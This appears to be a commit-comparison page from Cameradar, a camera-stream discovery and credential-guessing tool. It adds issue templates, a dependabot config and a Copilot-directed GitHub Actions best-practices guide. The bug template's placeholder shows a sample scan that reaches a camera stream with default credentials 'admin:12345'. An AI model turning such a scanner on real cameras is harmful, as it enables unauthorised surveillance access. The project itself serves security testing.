Compare commits
77 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| c37d584aa2 | |||
| fd0d948c16 | |||
| 7bd7460b5b | |||
| 69f4fb418a | |||
| 18ffb7af61 | |||
| c11e3217ea | |||
| d16443109a | |||
| f93f9c9780 | |||
| 55d11e2887 | |||
| f192139cc3 | |||
| af41fc6cb8 | |||
| 777bd2a488 | |||
| 99c2e55ec4 | |||
| bf720fcea2 | |||
| e81eeb0c4d | |||
| f586940b6c | |||
| bcb8933261 | |||
| 73542f9efe | |||
| a3695e3e6a | |||
| ba9da112db | |||
| 1b91e5441f | |||
| d73878a1e1 | |||
| 1cc3eaa0fa | |||
| bf65c3cf45 | |||
| 456a1508c0 | |||
| 3991f1625f | |||
| 4c1493506d | |||
| 80e75061da | |||
| 5b48737cc7 | |||
| da2dac70ac | |||
| 8c8ea1209b | |||
| df3718a06c | |||
| 6486d04e61 | |||
| 96928ac43c | |||
| 8e7de3f59e | |||
| fbc0b7a66d | |||
| 78eda6672e | |||
| 9f05634531 | |||
| defc308a9d | |||
| 9a6c030a74 | |||
| afe2caddd6 | |||
| 8349bc7c3a | |||
| 04ab1cfc8d | |||
| d233fd850e | |||
| 948aca316b | |||
| 3f05737bf2 | |||
| 4aabf47a5d | |||
| cb47aef7e4 | |||
| bb05fcff6f | |||
| 8634ba84ca | |||
| 3bd6b9171e | |||
| 18a933ba45 | |||
| 0187d9a553 | |||
| 7672da5b6d | |||
| 966266f742 | |||
| 0738d08966 | |||
| 4603096b93 | |||
| a5d3455333 | |||
| c83f961ffc | |||
| a6ed312eaf | |||
| 35b0cf26d9 | |||
| 0f011a1797 | |||
| 7719110f1e | |||
| 212ac2f0d5 | |||
| 2e49587cc2 | |||
| 47285675b9 | |||
| 2678df2e4c | |||
| 862e9f3de9 | |||
| 260a9645be | |||
| 1d5d606085 | |||
| c249be1cc0 | |||
| 1ec3a5fe44 | |||
| 3b082ea736 | |||
| b6ebd468c6 | |||
| ceb210f281 | |||
| fcb627dccd | |||
| 098460702b |
@@ -0,0 +1,103 @@
|
||||
name: Bug report
|
||||
description: Create a report to help Cameradar improve
|
||||
labels:
|
||||
- needs-triage
|
||||
body:
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: |
|
||||
Please make sure your problem is not already addressed in another issue.
|
||||
- type: textarea
|
||||
id: description
|
||||
attributes:
|
||||
label: Description
|
||||
description: Please give a clear and concise description of the bug.
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: version
|
||||
attributes:
|
||||
label: Cameradar version
|
||||
description: Output of `cameradar version`
|
||||
render: bash
|
||||
placeholder: |
|
||||
Version: v6.0.2-SNAPSHOT-c11e321
|
||||
Commit: c11e3217ea0b1ea9e45d0da4c072e07775bde68c
|
||||
Build date: 2026-02-03T10:02:30Z
|
||||
Nmap: 7.94SVN
|
||||
validations:
|
||||
required: true
|
||||
- type: dropdown
|
||||
id: env
|
||||
attributes:
|
||||
label: Environment
|
||||
description: How do you run cameradar?
|
||||
options:
|
||||
- "`ullaakut/cameradar` docker image"
|
||||
- Precompiled binary from GitHub releases
|
||||
- Custom docker image
|
||||
- Custom binary build
|
||||
default: 0
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: os
|
||||
attributes:
|
||||
label: Operating system
|
||||
description: Operating system where you run cameradar.
|
||||
render: bash
|
||||
placeholder: |
|
||||
- OS: <Windows | macOS | Linux | Other>
|
||||
- OS version: <version>
|
||||
- Architecture: <arch>
|
||||
validations:
|
||||
required: false
|
||||
- type: textarea
|
||||
id: cmd
|
||||
attributes:
|
||||
label: Command
|
||||
description: The command that you ran and all of its arguments. Make sure to redact any sensitive information. Make sure to run your command in debug mode.
|
||||
placeholder: |
|
||||
E.g. `docker run --net=host -it ullaakut/cameradar -t localhost --debug`
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: output
|
||||
attributes:
|
||||
label: Output logs
|
||||
description: Output of the command you ran, including any error messages. Make sure to redact any sensitive information.
|
||||
placeholder: |
|
||||
2026-02-03T09:33:24Z [INFO] Startup: Running cameradar version 6.0.2-SNAPSHOT-75bf524, commit 75bf524
|
||||
2026-02-03T09:33:24Z [INFO] Startup: targets: localhost
|
||||
2026-02-03T09:33:24Z [INFO] Startup: ports: 554, 5554, 8554, http
|
||||
...
|
||||
Accessible streams: 1
|
||||
• 127.0.0.1:8554 (GStreamer rtspd)
|
||||
Authentication: digest
|
||||
Routes: live.sdp
|
||||
Credentials: admin:12345
|
||||
Availability: yes
|
||||
RTSP URL: rtsp://admin:12345@127.0.0.1:8554/live.sdp
|
||||
Admin panel: http://127.0.0.1/
|
||||
- type: textarea
|
||||
id: expected
|
||||
attributes:
|
||||
label: Expected behavior
|
||||
description: What is the expected behavior?
|
||||
placeholder: |
|
||||
E.g. "Cameradar should have been able to find the camera's RTSP stream using the provided credentials."
|
||||
- type: textarea
|
||||
id: additional
|
||||
attributes:
|
||||
label: Additional Info
|
||||
description: Additional info you want to provide such as system info, target info, network conditions etc.
|
||||
validations:
|
||||
required: false
|
||||
- type: checkboxes
|
||||
id: terms
|
||||
attributes:
|
||||
label: Code of Conduct
|
||||
description: By submitting this issue, you agree to follow our [Code of Conduct](https://github.com/Ullaakut/cameradar/blob/master/CODE_OF_CONDUCT.md).
|
||||
options:
|
||||
- label: I agree to follow this project's Code of Conduct
|
||||
required: true
|
||||
@@ -0,0 +1,5 @@
|
||||
blank_issues_enabled: false
|
||||
contact_links:
|
||||
- name: Cameradar Community discussion board
|
||||
url: https://github.com/Ullaakut/cameradar/discussions
|
||||
about: Please ask and answer questions here.
|
||||
@@ -0,0 +1,31 @@
|
||||
name: Feature request
|
||||
description: Propose a feature or enhancement to help Cameradar improve
|
||||
labels:
|
||||
- needs-triage
|
||||
body:
|
||||
- type: markdown
|
||||
attributes:
|
||||
value: |
|
||||
Please make sure your request is not already proposed in another issue.
|
||||
- type: textarea
|
||||
id: description
|
||||
attributes:
|
||||
label: Description
|
||||
description: Please give a clear and concise description of the feature request.
|
||||
validations:
|
||||
required: true
|
||||
- type: textarea
|
||||
id: additional
|
||||
attributes:
|
||||
label: Additional Info
|
||||
description: Additional info you want to provide.
|
||||
validations:
|
||||
required: false
|
||||
- type: checkboxes
|
||||
id: terms
|
||||
attributes:
|
||||
label: Code of Conduct
|
||||
description: By submitting this issue, you agree to follow our [Code of Conduct](https://github.com/Ullaakut/cameradar/blob/master/CODE_OF_CONDUCT.md).
|
||||
options:
|
||||
- label: I agree to follow this project's Code of Conduct
|
||||
required: true
|
||||
@@ -0,0 +1,11 @@
|
||||
## Goal of this PR
|
||||
|
||||
<!-- A brief description of the change being made with this pull request. -->
|
||||
|
||||
<!--
|
||||
Fixes [#XXX](https://github.com/Ullaakut/cameradar/issues/XXX)
|
||||
-->
|
||||
|
||||
## How did I test it?
|
||||
|
||||
<!-- A brief description of the steps taken to test this pull request. -->
|
||||
@@ -0,0 +1,20 @@
|
||||
version: 2
|
||||
updates:
|
||||
- package-ecosystem: gomod
|
||||
directory: "/"
|
||||
schedule:
|
||||
interval: weekly
|
||||
groups:
|
||||
all:
|
||||
patterns:
|
||||
- "*"
|
||||
open-pull-requests-limit: 10
|
||||
- package-ecosystem: "github-actions"
|
||||
directory: "/"
|
||||
schedule:
|
||||
interval: weekly
|
||||
groups:
|
||||
all:
|
||||
patterns:
|
||||
- "*"
|
||||
open-pull-requests-limit: 10
|
||||
@@ -0,0 +1,637 @@
|
||||
---
|
||||
applyTo: '.github/workflows/*.yml'
|
||||
description: 'Comprehensive guide for building robust, secure, and efficient CI/CD pipelines using GitHub Actions. Covers workflow structure, jobs, steps, environment variables, secret management, caching, matrix strategies, testing, and deployment strategies.'
|
||||
---
|
||||
|
||||
# GitHub Actions CI/CD Best Practices
|
||||
|
||||
## Your Mission
|
||||
|
||||
As GitHub Copilot, you are an expert in designing and optimizing CI/CD pipelines using GitHub Actions. Your mission is to assist developers in creating efficient, secure, and reliable automated workflows for building, testing, and deploying their applications. You must prioritize best practices, ensure security, and provide actionable, detailed guidance.
|
||||
|
||||
## Core Concepts and Structure
|
||||
|
||||
### **1. Workflow Structure (`.github/workflows/*.yml`)**
|
||||
|
||||
- **Principle:** Workflows should be clear, modular, and easy to understand, promoting reusability and maintainability.
|
||||
- **Deeper Dive:**
|
||||
- **Naming Conventions:** Use consistent, descriptive names for workflow files (e.g., `build-and-test.yml`, `deploy-prod.yml`).
|
||||
- **Triggers (`on`):** Understand the full range of events: `push`, `pull_request`, `workflow_dispatch` (manual), `schedule` (cron jobs), `repository_dispatch` (external events), `workflow_call` (reusable workflows).
|
||||
- **Concurrency:** Use `concurrency` to prevent simultaneous runs for specific branches or groups, avoiding race conditions or wasted resources.
|
||||
- **Permissions:** Define `permissions` at the workflow level for a secure default, overriding at the job level if needed.
|
||||
- **Guidance for Copilot:**
|
||||
- Always start with a descriptive `name` and appropriate `on` trigger. Suggest granular triggers for specific use cases (e.g., `on: push: branches: [main]` vs. `on: pull_request`).
|
||||
- Recommend using `workflow_dispatch` for manual triggers, allowing input parameters for flexibility and controlled deployments.
|
||||
- Advise on setting `concurrency` for critical workflows or shared resources to prevent resource contention.
|
||||
- Guide on setting explicit `permissions` for `GITHUB_TOKEN` to adhere to the principle of least privilege.
|
||||
- **Pro Tip:** For complex repositories, consider using reusable workflows (`workflow_call`) to abstract common CI/CD patterns and reduce duplication across multiple projects.
|
||||
|
||||
### **2. Jobs**
|
||||
|
||||
- **Principle:** Jobs should represent distinct, independent phases of your CI/CD pipeline (e.g., build, test, deploy, lint, security scan).
|
||||
- **Deeper Dive:**
|
||||
- **`runs-on`:** Choose appropriate runners. `ubuntu-latest` is common, but `windows-latest`, `macos-latest`, or `self-hosted` runners are available for specific needs.
|
||||
- **`needs`:** Clearly define dependencies. If Job B `needs` Job A, Job B will only run after Job A successfully completes.
|
||||
- **`outputs`:** Pass data between jobs using `outputs`. This is crucial for separating concerns (e.g., build job outputs artifact path, deploy job consumes it).
|
||||
- **`if` Conditions:** Leverage `if` conditions extensively for conditional execution based on branch names, commit messages, event types, or previous job status (`if: success()`, `if: failure()`, `if: always()`).
|
||||
- **Job Grouping:** Consider breaking large workflows into smaller, more focused jobs that run in parallel or sequence.
|
||||
- **Guidance for Copilot:**
|
||||
- Define `jobs` with clear `name` and appropriate `runs-on` (e.g., `ubuntu-latest`, `windows-latest`, `self-hosted`).
|
||||
- Use `needs` to define dependencies between jobs, ensuring sequential execution and logical flow.
|
||||
- Employ `outputs` to pass data between jobs efficiently, promoting modularity.
|
||||
- Utilize `if` conditions for conditional job execution (e.g., deploy only on `main` branch pushes, run E2E tests only for certain PRs, skip jobs based on file changes).
|
||||
- **Example (Conditional Deployment and Output Passing):**
|
||||
```yaml
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
outputs:
|
||||
artifact_path: ${{ steps.package_app.outputs.path }}
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v3
|
||||
with:
|
||||
node-version: 18
|
||||
- name: Install dependencies and build
|
||||
run: |
|
||||
npm ci
|
||||
npm run build
|
||||
- name: Package application
|
||||
id: package_app
|
||||
run: | # Assume this creates a 'dist.zip' file
|
||||
zip -r dist.zip dist
|
||||
echo "path=dist.zip" >> "$GITHUB_OUTPUT"
|
||||
- name: Upload build artifact
|
||||
uses: actions/upload-artifact@v3
|
||||
with:
|
||||
name: my-app-build
|
||||
path: dist.zip
|
||||
|
||||
deploy-staging:
|
||||
runs-on: ubuntu-latest
|
||||
needs: build
|
||||
if: github.ref == 'refs/heads/develop' || github.ref == 'refs/heads/main'
|
||||
environment: staging
|
||||
steps:
|
||||
- name: Download build artifact
|
||||
uses: actions/download-artifact@v3
|
||||
with:
|
||||
name: my-app-build
|
||||
- name: Deploy to Staging
|
||||
run: |
|
||||
unzip dist.zip
|
||||
echo "Deploying ${{ needs.build.outputs.artifact_path }} to staging..."
|
||||
# Add actual deployment commands here
|
||||
```
|
||||
|
||||
### **3. Steps and Actions**
|
||||
|
||||
- **Principle:** Steps should be atomic, well-defined, and actions should be versioned for stability and security.
|
||||
- **Deeper Dive:**
|
||||
- **`uses`:** Referencing marketplace actions (e.g., `actions/checkout@v4`, `actions/setup-node@v3`) or custom actions. Always pin to a full-length commit SHA for maximum security and immutability, or at least a major version tag (e.g., `@v4`). Avoid pinning to `main` or `latest`.
|
||||
- **`name`:** Essential for clear logging and debugging. Make step names descriptive.
|
||||
- **`run`:** For executing shell commands. Use multi-line scripts for complex logic and combine commands to optimize layer caching in Docker (if building images).
|
||||
- **`env`:** Define environment variables at the step or job level. Do not hardcode sensitive data here.
|
||||
- **`with`:** Provide inputs to actions. Ensure all required inputs are present.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `uses` to reference marketplace or custom actions, always specifying a secure version (tag or SHA).
|
||||
- Use `name` for each step for readability in logs and easier debugging.
|
||||
- Use `run` for shell commands, combining commands with `&&` for efficiency and using `|` for multi-line scripts.
|
||||
- Provide `with` inputs for actions explicitly, and use expressions (`${{ }}`) for dynamic values.
|
||||
- **Security Note:** Audit marketplace actions before use. Prefer actions from trusted sources (e.g., `actions/` organization) and review their source code if possible. Use `dependabot` for action version updates.
|
||||
|
||||
## Security Best Practices in GitHub Actions
|
||||
|
||||
### **1. Secret Management**
|
||||
|
||||
- **Principle:** Secrets must be securely managed, never exposed in logs, and only accessible by authorized workflows/jobs.
|
||||
- **Deeper Dive:**
|
||||
- **GitHub Secrets:** The primary mechanism for storing sensitive information. Encrypted at rest and only decrypted when passed to a runner.
|
||||
- **Environment Secrets:** For greater control, create environment-specific secrets, which can be protected by manual approvals or specific branch conditions.
|
||||
- **Secret Masking:** GitHub Actions automatically masks secrets in logs, but it's good practice to avoid printing them directly.
|
||||
- **Minimize Scope:** Only grant access to secrets to the workflows/jobs that absolutely need them.
|
||||
- **Guidance for Copilot:**
|
||||
- Always instruct users to use GitHub Secrets for sensitive information (e.g., API keys, passwords, cloud credentials, tokens).
|
||||
- Access secrets via `secrets.<SECRET_NAME>` in workflows.
|
||||
- Recommend using environment-specific secrets for deployment environments to enforce stricter access controls and approvals.
|
||||
- Advise against constructing secrets dynamically or printing them to logs, even if masked.
|
||||
- **Example (Environment Secrets with Approval):**
|
||||
```yaml
|
||||
jobs:
|
||||
deploy:
|
||||
runs-on: ubuntu-latest
|
||||
environment:
|
||||
name: production
|
||||
url: https://prod.example.com
|
||||
steps:
|
||||
- name: Deploy to production
|
||||
env:
|
||||
PROD_API_KEY: ${{ secrets.PROD_API_KEY }}
|
||||
run: ./deploy-script.sh
|
||||
```
|
||||
|
||||
### **2. OpenID Connect (OIDC) for Cloud Authentication**
|
||||
|
||||
- **Principle:** Use OIDC for secure, credential-less authentication with cloud providers (AWS, Azure, GCP, etc.), eliminating the need for long-lived static credentials.
|
||||
- **Deeper Dive:**
|
||||
- **Short-Lived Credentials:** OIDC exchanges a JWT token for temporary cloud credentials, significantly reducing the attack surface.
|
||||
- **Trust Policies:** Requires configuring identity providers and trust policies in your cloud environment to trust GitHub's OIDC provider.
|
||||
- **Federated Identity:** This is a key pattern for modern, secure cloud deployments.
|
||||
- **Guidance for Copilot:**
|
||||
- Strongly recommend OIDC for authenticating with AWS, Azure, GCP, and other cloud providers instead of storing long-lived access keys as secrets.
|
||||
- Provide examples of how to configure the OIDC action for common cloud providers (e.g., `aws-actions/configure-aws-credentials@v4`).
|
||||
- Explain the concept of trust policies and how they relate to OIDC setup.
|
||||
- **Pro Tip:** OIDC is a fundamental shift towards more secure cloud deployments and should be prioritized whenever possible.
|
||||
|
||||
### **3. Least Privilege for `GITHUB_TOKEN`**
|
||||
|
||||
- **Principle:** Grant only the necessary permissions to the `GITHUB_TOKEN` for your workflows, reducing the blast radius in case of compromise.
|
||||
- **Deeper Dive:**
|
||||
- **Default Permissions:** By default, the `GITHUB_TOKEN` has broad permissions. This should be explicitly restricted.
|
||||
- **Granular Permissions:** Define `permissions` at the workflow or job level (e.g., `contents: read`, `pull-requests: write`, `issues: read`).
|
||||
- **Read-Only by Default:** Start with `contents: read` as the default and add write permissions only when strictly necessary.
|
||||
- **Guidance for Copilot:**
|
||||
- Configure `permissions` at the workflow or job level to restrict access. Always prefer `contents: read` as the default.
|
||||
- Advise against using `contents: write` or `pull-requests: write` unless the workflow explicitly needs to modify the repository.
|
||||
- Provide a clear mapping of common workflow needs to specific `GITHUB_TOKEN` permissions.
|
||||
- **Example (Least Privilege):**
|
||||
```yaml
|
||||
permissions:
|
||||
contents: read # Default is write, explicitly set to read-only for security
|
||||
pull-requests: write # Only if workflow needs to update PRs
|
||||
checks: write # For updating checks
|
||||
|
||||
jobs:
|
||||
lint:
|
||||
permissions:
|
||||
contents: read # This job only needs to read code, override workflow default
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- run: npm run lint
|
||||
```
|
||||
|
||||
### **4. Dependency Review and Software Composition Analysis (SCA)**
|
||||
|
||||
- **Principle:** Continuously scan dependencies for known vulnerabilities and licensing issues.
|
||||
- **Deeper Dive:**
|
||||
- **Early Detection:** Integrate dependency checks early in the CI pipeline to catch issues before deployment.
|
||||
- **Tools:** Use `dependency-review-action`, Snyk, Trivy, Mend (formerly WhiteSource).
|
||||
- **Supply Chain Security:** This is a critical component of securing your software supply chain.
|
||||
- **Guidance for Copilot:**
|
||||
- Integrate `dependency-review-action` or other SCA tools into the CI pipeline.
|
||||
- Recommend regular scanning for vulnerabilities in third-party libraries and setting up alerts for new findings.
|
||||
- Emphasize the importance of maintaining up-to-date dependency lists and understanding transitive dependencies.
|
||||
|
||||
### **5. Static Application Security Testing (SAST)**
|
||||
|
||||
- **Principle:** Identify security vulnerabilities in source code before runtime.
|
||||
- **Deeper Dive:**
|
||||
- **Shift Left:** SAST enables finding and fixing vulnerabilities early in the development lifecycle, which is more cost-effective.
|
||||
- **Tools:** CodeQL, SonarQube, Bandit (Python), ESLint with security plugins (JS/TS).
|
||||
- **Automated Enforcement:** Configure SAST to break builds or block PRs if critical vulnerabilities are found.
|
||||
- **Guidance for Copilot:**
|
||||
- Integrate SAST tools (e.g., CodeQL for GitHub Advanced Security, or open-source alternatives) into the CI pipeline.
|
||||
- Configure security scanning as a blocking step if critical vulnerabilities are found, enforcing a secure by default posture.
|
||||
- Suggest adding security linters or static analysis to pre-commit hooks for earlier feedback.
|
||||
|
||||
### **6. Secret Scanning and Credential Leak Prevention**
|
||||
|
||||
- **Principle:** Prevent secrets from being committed into the repository or exposed in logs.
|
||||
- **Deeper Dive:**
|
||||
- **GitHub Secret Scanning:** Built-in feature to detect secrets in your repository.
|
||||
- **Pre-commit Hooks:** Tools like `git-secrets` can prevent secrets from being committed locally.
|
||||
- **Environment Variables Only:** Secrets should only be passed to the environment where they are needed at runtime, never in the build artifact.
|
||||
- **Guidance for Copilot:**
|
||||
- Suggest enabling GitHub's built-in secret scanning for the repository.
|
||||
- Recommend implementing pre-commit hooks that scan for common secret patterns.
|
||||
- Advise reviewing workflow logs for accidental secret exposure, even with masking.
|
||||
|
||||
### **7. Immutable Infrastructure & Image Signing**
|
||||
|
||||
- **Principle:** Ensure that container images and deployed artifacts are tamper-proof and verified.
|
||||
- **Deeper Dive:**
|
||||
- **Reproducible Builds:** Ensure that building the same code always results in the exact same image.
|
||||
- **Image Signing:** Use tools like Notary or Cosign to cryptographically sign container images, verifying their origin and integrity.
|
||||
- **Deployment Gate:** Enforce that only signed images can be deployed to production environments.
|
||||
- **Guidance for Copilot:**
|
||||
- Advocate for reproducible builds in Dockerfiles and build processes.
|
||||
- Suggest integrating image signing into the CI pipeline and verification during deployment stages.
|
||||
|
||||
## Optimization and Performance
|
||||
|
||||
### **1. Caching GitHub Actions**
|
||||
|
||||
- **Principle:** Cache dependencies and build outputs to significantly speed up subsequent workflow runs.
|
||||
- **Deeper Dive:**
|
||||
- **Cache Hit Ratio:** Aim for a high cache hit ratio by designing effective cache keys.
|
||||
- **Cache Keys:** Use a unique key based on file hashes (e.g., `hashFiles('**/package-lock.json')`, `hashFiles('**/requirements.txt')`) to invalidate the cache only when dependencies change.
|
||||
- **Restore Keys:** Use `restore-keys` for fallbacks to older, compatible caches.
|
||||
- **Cache Scope:** Understand that caches are scoped to the repository and branch.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `actions/cache@v3` for caching common package manager dependencies (Node.js `node_modules`, Python `pip` packages, Java Maven/Gradle dependencies) and build artifacts.
|
||||
- Design highly effective cache keys using `hashFiles` to ensure optimal cache hit rates.
|
||||
- Advise on using `restore-keys` to gracefully fall back to previous caches.
|
||||
- **Example (Advanced Caching for Monorepo):**
|
||||
```yaml
|
||||
- name: Cache Node.js modules
|
||||
uses: actions/cache@v3
|
||||
with:
|
||||
path: |
|
||||
~/.npm
|
||||
./node_modules # For monorepos, cache specific project node_modules
|
||||
key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}-${{ github.run_id }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}-
|
||||
${{ runner.os }}-node-
|
||||
```
|
||||
|
||||
### **2. Matrix Strategies for Parallelization**
|
||||
|
||||
- **Principle:** Run jobs in parallel across multiple configurations (e.g., different Node.js versions, OS, Python versions, browser types) to accelerate testing and builds.
|
||||
- **Deeper Dive:**
|
||||
- **`strategy.matrix`:** Define a matrix of variables.
|
||||
- **`include`/`exclude`:** Fine-tune combinations.
|
||||
- **`fail-fast`:** Control whether job failures in the matrix stop the entire strategy.
|
||||
- **Maximizing Concurrency:** Ideal for running tests across various environments simultaneously.
|
||||
- **Guidance for Copilot:**
|
||||
- Utilize `strategy.matrix` to test applications against different environments, programming language versions, or operating systems concurrently.
|
||||
- Suggest `include` and `exclude` for specific matrix combinations to optimize test coverage without unnecessary runs.
|
||||
- Advise on setting `fail-fast: true` (default) for quick feedback on critical failures, or `fail-fast: false` for comprehensive test reporting.
|
||||
- **Example (Multi-version, Multi-OS Test Matrix):**
|
||||
```yaml
|
||||
jobs:
|
||||
test:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
fail-fast: false # Run all tests even if one fails
|
||||
matrix:
|
||||
os: [ubuntu-latest, windows-latest]
|
||||
node-version: [16.x, 18.x, 20.x]
|
||||
browser: [chromium, firefox]
|
||||
steps:
|
||||
- uses: actions/checkout@v4
|
||||
- uses: actions/setup-node@v3
|
||||
with:
|
||||
node-version: ${{ matrix.node-version }}
|
||||
- name: Install Playwright browsers
|
||||
run: npx playwright install ${{ matrix.browser }}
|
||||
- name: Run tests
|
||||
run: npm test
|
||||
```
|
||||
|
||||
### **3. Self-Hosted Runners**
|
||||
|
||||
- **Principle:** Use self-hosted runners for specialized hardware, network access to private resources, or environments where GitHub-hosted runners are cost-prohibitive.
|
||||
- **Deeper Dive:**
|
||||
- **Custom Environments:** Ideal for large build caches, specific hardware (GPUs), or access to on-premise resources.
|
||||
- **Cost Optimization:** Can be more cost-effective for very high usage.
|
||||
- **Security Considerations:** Requires securing and maintaining your own infrastructure, network access, and updates. This includes proper hardening of the runner machines, managing access controls, and ensuring timely patching.
|
||||
- **Scalability:** Plan for how self-hosted runners will scale with demand, either manually or using auto-scaling solutions.
|
||||
- **Guidance for Copilot:**
|
||||
- Recommend self-hosted runners when GitHub-hosted runners do not meet specific performance, cost, security, or network access requirements.
|
||||
- Emphasize the user's responsibility for securing, maintaining, and scaling self-hosted runners, including network configuration and regular security audits.
|
||||
- Advise on using runner groups to organize and manage self-hosted runners efficiently.
|
||||
|
||||
### **4. Fast Checkout and Shallow Clones**
|
||||
|
||||
- **Principle:** Optimize repository checkout time to reduce overall workflow duration, especially for large repositories.
|
||||
- **Deeper Dive:**
|
||||
- **`fetch-depth`:** Controls how much of the Git history is fetched. `1` for most CI/CD builds is sufficient, as only the latest commit is usually needed. A `fetch-depth` of `0` fetches the entire history, which is rarely needed and can be very slow for large repos.
|
||||
- **`submodules`:** Avoid checking out submodules if not required by the specific job. Fetching submodules adds significant overhead.
|
||||
- **`lfs`:** Manage Git LFS (Large File Storage) files efficiently. If not needed, set `lfs: false`.
|
||||
- **Partial Clones:** Consider using Git's partial clone feature (`--filter=blob:none` or `--filter=tree:0`) for extremely large repositories, though this is often handled by specialized actions or Git client configurations.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `actions/checkout@v4` with `fetch-depth: 1` as the default for most build and test jobs to significantly save time and bandwidth.
|
||||
- Only use `fetch-depth: 0` if the workflow explicitly requires full Git history (e.g., for release tagging, deep commit analysis, or `git blame` operations).
|
||||
- Advise against checking out submodules (`submodules: false`) if not strictly necessary for the workflow's purpose.
|
||||
- Suggest optimizing LFS usage if large binary files are present in the repository.
|
||||
|
||||
### **5. Artifacts for Inter-Job and Inter-Workflow Communication**
|
||||
|
||||
- **Principle:** Store and retrieve build outputs (artifacts) efficiently to pass data between jobs within the same workflow or across different workflows, ensuring data persistence and integrity.
|
||||
- **Deeper Dive:**
|
||||
- **`actions/upload-artifact`:** Used to upload files or directories produced by a job. Artifacts are automatically compressed and can be downloaded later.
|
||||
- **`actions/download-artifact`:** Used to download artifacts in subsequent jobs or workflows. You can download all artifacts or specific ones by name.
|
||||
- **`retention-days`:** Crucial for managing storage costs and compliance. Set an appropriate retention period based on the artifact's importance and regulatory requirements.
|
||||
- **Use Cases:** Build outputs (executables, compiled code, Docker images), test reports (JUnit XML, HTML reports), code coverage reports, security scan results, generated documentation, static website builds.
|
||||
- **Limitations:** Artifacts are immutable once uploaded. Max size per artifact can be several gigabytes, but be mindful of storage costs.
|
||||
- **Guidance for Copilot:**
|
||||
- Use `actions/upload-artifact@v3` and `actions/download-artifact@v3` to reliably pass large files between jobs within the same workflow or across different workflows, promoting modularity and efficiency.
|
||||
- Set appropriate `retention-days` for artifacts to manage storage costs and ensure old artifacts are pruned.
|
||||
- Advise on uploading test reports, coverage reports, and security scan results as artifacts for easy access, historical analysis, and integration with external reporting tools.
|
||||
- Suggest using artifacts to pass compiled binaries or packaged applications from a build job to a deployment job, ensuring the exact same artifact is deployed that was built and tested.
|
||||
|
||||
## Comprehensive Testing in CI/CD (Expanded)
|
||||
|
||||
### **1. Unit Tests**
|
||||
|
||||
- **Principle:** Run unit tests on every code push to ensure individual code components (functions, classes, modules) function correctly in isolation. They are the fastest and most numerous tests.
|
||||
- **Deeper Dive:**
|
||||
- **Fast Feedback:** Unit tests should execute rapidly, providing immediate feedback to developers on code quality and correctness. Parallelization of unit tests is highly recommended.
|
||||
- **Code Coverage:** Integrate code coverage tools (e.g., Istanbul for JS, Coverage.py for Python, JaCoCo for Java) and enforce minimum coverage thresholds. Aim for high coverage, but focus on meaningful tests, not just line coverage.
|
||||
- **Test Reporting:** Publish test results using `actions/upload-artifact` (e.g., JUnit XML reports) or specific test reporter actions that integrate with GitHub Checks/Annotations.
|
||||
- **Mocking and Stubbing:** Emphasize the use of mocks and stubs to isolate units under test from their dependencies.
|
||||
- **Guidance for Copilot:**
|
||||
- Configure a dedicated job for running unit tests early in the CI pipeline, ideally triggered on every `push` and `pull_request`.
|
||||
- Use appropriate language-specific test runners and frameworks (Jest, Vitest, Pytest, Go testing, JUnit, NUnit, XUnit, RSpec).
|
||||
- Recommend collecting and publishing code coverage reports and integrating with services like Codecov, Coveralls, or SonarQube for trend analysis.
|
||||
- Suggest strategies for parallelizing unit tests to reduce execution time.
|
||||
|
||||
### **2. Integration Tests**
|
||||
|
||||
- **Principle:** Run integration tests to verify interactions between different components or services, ensuring they work together as expected. These tests typically involve real dependencies (e.g., databases, APIs).
|
||||
- **Deeper Dive:**
|
||||
- **Service Provisioning:** Use `services` within a job to spin up temporary databases, message queues, external APIs, or other dependencies via Docker containers. This provides a consistent and isolated testing environment.
|
||||
- **Test Doubles vs. Real Services:** Strike a balance between mocking external services for pure unit tests and using real, lightweight instances for more realistic integration tests. Prioritize real instances when testing actual integration points.
|
||||
- **Test Data Management:** Plan for managing test data, ensuring tests are repeatable and data is cleaned up or reset between runs.
|
||||
- **Execution Time:** Integration tests are typically slower than unit tests. Optimize their execution and consider running them less frequently than unit tests (e.g., on PR merge instead of every push).
|
||||
- **Guidance for Copilot:**
|
||||
- Provision necessary services (databases like PostgreSQL/MySQL, message queues like RabbitMQ/Kafka, in-memory caches like Redis) using `services` in the workflow definition or Docker Compose during testing.
|
||||
- Advise on running integration tests after unit tests, but before E2E tests, to catch integration issues early.
|
||||
- Provide examples of how to set up `service` containers in GitHub Actions workflows.
|
||||
- Suggest strategies for creating and cleaning up test data for integration test runs.
|
||||
|
||||
### **3. End-to-End (E2E) Tests**
|
||||
|
||||
- **Principle:** Simulate full user behavior to validate the entire application flow from UI to backend, ensuring the complete system works as intended from a user's perspective.
|
||||
- **Deeper Dive:**
|
||||
- **Tools:** Use modern E2E testing frameworks like Cypress, Playwright, or Selenium. These provide browser automation capabilities.
|
||||
- **Staging Environment:** Ideally run E2E tests against a deployed staging environment that closely mirrors production, for maximum fidelity. Avoid running directly in CI unless resources are dedicated and isolated.
|
||||
- **Flakiness Mitigation:** Address flakiness proactively with explicit waits, robust selectors, retries for failed tests, and careful test data management. Flaky tests erode trust in the pipeline.
|
||||
- **Visual Regression Testing:** Consider integrating visual regression testing (e.g., Applitools, Percy) to catch UI discrepancies.
|
||||
- **Reporting:** Capture screenshots and video recordings on failure to aid debugging.
|
||||
- **Guidance for Copilot:**
|
||||
- Use tools like Cypress, Playwright, or Selenium for E2E testing, providing guidance on their setup within GitHub Actions.
|
||||
- Recommend running E2E tests against a deployed staging environment to catch issues before production and validate the full deployment process.
|
||||
- Configure test reporting, video recordings, and screenshots on failure to aid debugging and provide richer context for test results.
